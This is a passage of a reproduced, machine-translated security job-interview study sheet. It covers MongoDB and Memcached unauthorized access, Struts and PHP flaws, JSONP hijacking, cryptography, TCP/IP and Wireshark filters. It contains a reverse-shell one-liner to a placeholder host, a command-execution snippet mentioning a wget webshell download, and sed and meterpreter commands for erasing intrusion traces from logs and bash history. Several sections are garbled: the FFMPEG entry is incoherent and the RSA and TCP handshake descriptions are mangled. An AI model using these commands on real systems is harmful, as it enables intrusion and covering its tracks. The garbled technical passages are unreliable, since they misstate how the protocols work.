println "ifconfig -a".execute().text executes some system commands and uses wget to download webshell
When the MongoDB service is started without adding any parameters, there is no permission verification by default, and the database can be accessed remotely. Login users can perform any high-risk operations such as adding, deleting, modifying, and checking the database through the default port without a password.
protection
Add authentication for MongoDB: 1) Add the –auth parameter when MongoDB starts 2) Add a user to MongoDB: use admin #Use admin library db.addUser("root", "123456") #Add user db with username root and password 123456. auth("root","123456") #Verify whether the addition is successful. Return 1 to indicate success. 2. Disable HTTP and REST ports. MongoDB itself has an HTTP service and supports REST interface. After 2.6, these interfaces are closed by default. By default, mongoDB will use the default port to listen to the web service. Generally, there is no need for remote management through the web. It is recommended to disable it. Modify the configuration file or select the –nohttpinterface parameter nohttpinterface=false at startup. 3. Restrict the binding IP. Add the parameter –bind_ip 127.0.0.1 at startup or add the following content to the /etc/mongodb.conf file: bind_ip = 127.0.0.1
5. Unauthorized access to Memcache
Memcached is a commonly used key-value caching system. Since it does not have a permission control module, the Memcache service open to the public network can easily be scanned and discovered by attackers. Attackers can directly read sensitive information in Memcached through command interaction. .
use
a. Log in to the machine and execute the netstat -an |more command to check the port monitoring status. The echo 0.0.0.0:11211 indicates that all network cards are monitored, and there is a memcached unauthorized access vulnerability.
b. Telnet 11211, or nc -vv 11211, if the connection is successful, the vulnerability exists.
Vulnerability hardening
a. Set memchached to only allow local access. b. Disable external network access to Memcached port 11211. c. Add –enable-sasl when compiling to enable SASL authentication.
6. FFMPEG local file reading
principle
Encrypt the payload into a segment of bytes that will be executed by calling the encryption API. But in the specific answer to the project, I only answered the old SSRF hole, m3u8 header, offset, and encryption.
19. Safety knowledge
1、WEB
Common WEB development JAVA frameworks
STRUTS, SPRING Common Java Framework Vulnerabilities In fact, when the interviewer asked this question, I wasn't quite sure what he was asking. I mentioned struts' 045 048, common deserialization in Java. 045 Error handling introduces ognl expression 048 In the process of encapsulating action, there is a step to call getstackvalue to recursively obtain the ognl expression deserialization operation object, which is introduced by means. The reflection mechanism of apache common and the rewriting of readobject, in fact, I can’t remember the details. . . Then this part is over
Same origin policy
The same-origin policy restricts different sources from reading or setting the attribute content of the current document. Distinguishing different sources: protocol, domain name, subdomain name, IP, port. If there are differences in the above, it means different sources.
Jsonp security attack and defense technology, how to write Jsonp attack page
Security attack and defense content involving Jsonp
JSON hijacking, Callback can be defined, JSONP content can be defined, and Content-type is not json.
attack page
JSON hijacking, cross-domain hijacking of sensitive information, the page is similar to
function wooyun(v){
alert(v.username);
}
When Content-type is incorrect, JSONP and Callback content can be defined, which can cause XSS. For JSONP, FLASH and other applications, please refer to Chuangyu’s JSONP security attack and defense technology.
2、PHP
Functions involved in command execution in php
代码执行:eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function()
文件读取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open() to
bypass the disable function of PHP in safe mode
DL functions, component vulnerabilities, environment variables.
PHP weak typing
== When comparing, the string types will be converted to the same type first, and then compared
If comparing a number to a string or comparing strings involving numeric content, the string is converted to a numeric value and the comparison is performed as a numeric value
A string starting with 0e is equal to 0
3. Database
The location where various database files are stored
mysql:
/usr/local/mysql/data/
C:\ProgramData\MySQL\MySQL Server 5.6\Data\
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/
4. System
How to clear logs
meterpreter:
What logs need to be cleared after clearev invades the Linux server?
Web logs, such as apache's access.log, error.log. It is too obvious to clear the log directly. Generally, sed is used for targeted clearing.
e.g. sed -i -e ‘/192.169.1.1/d’
The clearing of the history command is also a directed clearing of ~/.bash_history
Clearing wtmp logs, /var/log/wtmp
Login log clear /var/log/secure What are the
LINUX
commands to check the current port connection? The differences, advantages and disadvantages of netstat and ss commands
netstat -antp` `ss -l
The advantage of ss is that it can display more and more detailed information about TCP and connection status, and it is faster and more efficient than netstat.
Common commands for rebound shell? Which shell is usually bounced? Why?
bash -i>&/dev/tcp/x.x.x.x/4444 0>&1
What information can be obtained through the /proc directory of the Linux system, and what security applications can this information have?
ls /proc
System information, hardware information, kernel version, loaded modules, and processes
In Linux systems, detecting the configuration items of which configuration files can improve the security of SSH.
/etc/ssh/sshd___configiptables configuration
How to view the last hundred lines of file content with one command
tail -n 100 filename
How does Windows
harden the Windows desktop working environment in a domain environment? Please give your thoughts.
5. Cryptography
Specific working steps of AES/DES
RSA algorithm
Encryption:
ciphertext = plaintext ^EmodN
RSA encryption is the process of dividing the plain text by N after raising it to the power of E. Public
key = (E, N)
Decryption:
plain text = cipher text ^DmodN private key = (D, N)
Three parameters n, e1, e2
n is the product of two large prime numbers p and q.
Encryption mode of block cipher.
How to generate a secure random number?
Quoting a previous senior's answer, random numbers can be generated through some physical systems, such as voltage fluctuations, disk head seek time when reading/writing, the noise of electromagnetic waves in the air, etc.
SSL handshake process
Establish a TCP connection, the client sends an SSL request, the server processes the SSL request, the client sends random data encrypted by the public key, the server decrypts the encrypted random data with the private key and negotiates the password, and the server and client use The secret code generates the encryption algorithm and key, and then communicates normally. I originally forgot about this part, but when I was watching SSL Pinning before, I seemed to have a picture in my mind. After struggling for a long time, I still couldn't be sure, so I gave up. . .
What are the differences between symmetric encryption and asymmetric encryption, and what are they used in?
6、TCP/IP
TCP three-way handshake process and corresponding state transitions
(1) The client sends a SYN packet to the server, including the port number used by the client and the initial sequence number x; (
2) After receiving the SYN packet from the client, the server sends a SYN and ACK to the client The TCP message with both bits set contains the confirmation number xx1 and the server's initial sequence number y; (
3) After receiving the SYNSACK message returned by the server, the client returns a confirmation number yy1 and sequence number xx1 to the server. ACK message, a standard TCP connection is completed.
The difference between TCP and UDP protocols
TCP is connection-oriented and UDP is message-oriented. TCP has many requirements for system resources. UDP has a simple structure. TCP guarantees data integrity and order. UDP does not guarantee the
establishment process of https.
a. The client sends a request to the server.
b. The server returns the certificate and public key. The public key exists as part of the certificate.
c. The client verifies the validity of the certificate and public key. If valid, generates a shared secret. The key is encrypted using the public key and sent to the server
d. The server uses the private key to decrypt the data and uses the received shared key to encrypt the data and sends it to the client
e. The client uses the shared key to decrypt the data
f. SSL Encrypted establishment
7. Traffic analysis
Wireshark simple filtering rules
filter ip:
Filter source ip address: ip.src1.1.1.1;, destination ip address: ip.dst1.1.1.1;
Filter port:
Filter port 80: tcp.port80, source port: tcp.srcport80, destination port: tcp.dstport==80
Protocol filtering:
Just enter the protocol name directly, such as http protocol http
http mode filtering:
Filter get/post package http.request.method=="GET/POST"
8. Firewall
Briefly describe several basic configuration hardening items commonly used in routers, switches, firewalls and other network equipment, as well as configuration methods.
This article is reproduced from the Internet and has been deleted.